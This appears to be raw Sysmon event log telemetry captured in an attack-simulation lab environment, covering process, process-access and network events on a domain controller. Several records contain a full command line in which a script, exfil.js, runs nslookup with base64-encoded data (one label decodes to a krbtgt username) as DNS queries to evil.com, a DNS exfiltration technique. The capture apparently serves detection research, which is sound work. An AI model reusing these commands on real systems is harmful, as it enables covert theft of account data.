14:16:32.995{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17C1-629A-A340-000000005F02}3776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200899Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.995{2E1864BB-17C0-629A-A140-000000005F02}5440300C:\Windows\system32\cmd.exe{2E1864BB-17C1-629A-A340-000000005F02}3776C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200898Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:33.003{2E1864BB-17C1-629A-A340-000000005F02}3776C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-A140-000000005F02}5440C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlnhpg.tmp 2>&1 23542300x800000000000000043939Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:33.776{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB0B27389F732CD03BFE35F190E932B9,SHA256=7588178AD2A335F83611F3C2C1F259BE518E980A0D9AB194D8CACD34D7AC2249,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000201426Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.938{2E1864BB-17C2-629A-D840-000000005F02}58846676C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-D940-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201425Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.922{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201424Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.922{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201423Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.922{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201422Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.922{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201421Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.922{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D940-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201420Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.922{2E1864BB-17C2-629A-D740-000000005F02}21325384C:\Windows\system32\cmd.exe{2E1864BB-17C2-629A-D940-000000005F02}5516C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201419Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.929{2E1864BB-17C2-629A-D940-000000005F02}5516C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C2-629A-D740-000000005F02}2132C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbvo.tmp 2>&1 10341000x8000000000000000201418Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.884{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-D840-000000005F02}5884C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201417Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.884{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C2-629A-D840-000000005F02}5884C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201416Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.884{2E1864BB-17C2-629A-D840-000000005F02}58846676C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-D740-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201415Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.853{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D840-000000005F02}5884C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201414Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.853{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D740-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201413Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.853{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201412Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.853{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201411Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.853{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201410Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.853{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201409Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.853{2E1864BB-17A1-629A-783D-000000005F02}55527428C:\Windows\System32\WScript.exe{2E1864BB-17C2-629A-D740-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201408Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.853{2E1864BB-17C2-629A-D740-000000005F02}2132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IGtyYnRndA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcbvo.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000201407Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.837{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnrzt.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000201406Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.634{00000000-0000-0000-0000-000000000000}3776<unknown process>-udpfalsefalse127.0.0.1-52796-false127.0.0.1-53domain 354300x8000000000000000201405Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.634{00000000-0000-0000-0000-000000000000}3776<unknown process>-udptruefalse127.0.0.1-52796-false127.0.0.1-53domain 354300x8000000000000000201404Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.633{00000000-0000-0000-0000-000000000000}3776<unknown process>-udptruefalse127.0.0.1-52795-false127.0.0.1-53domain 354300x8000000000000000201403Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.633{00000000-0000-0000-0000-000000000000}3776<unknown process>-udptruefalse127.0.0.1-52794-false127.0.0.1-53domain 354300x8000000000000000201402Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.523{00000000-0000-0000-0000-000000000000}7788<unknown process>-udpfalsefalse127.0.0.1-52793-false127.0.0.1-53domain 354300x8000000000000000201401Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.523{00000000-0000-0000-0000-000000000000}7788<unknown process>-udptruefalse127.0.0.1-52793-false127.0.0.1-53domain 10341000x8000000000000000201400Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.784{2E1864BB-17C2-629A-D540-000000005F02}38407864C:\Windows\system32\conhost.exe{2E1864BB-17C2-629A-D640-000000005F02}1648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201399Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.769{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201398Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.769{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201397Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.769{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201396Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.769{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201395Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:34.769{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C2-629A-D640-000000005F02}1648C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201394Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 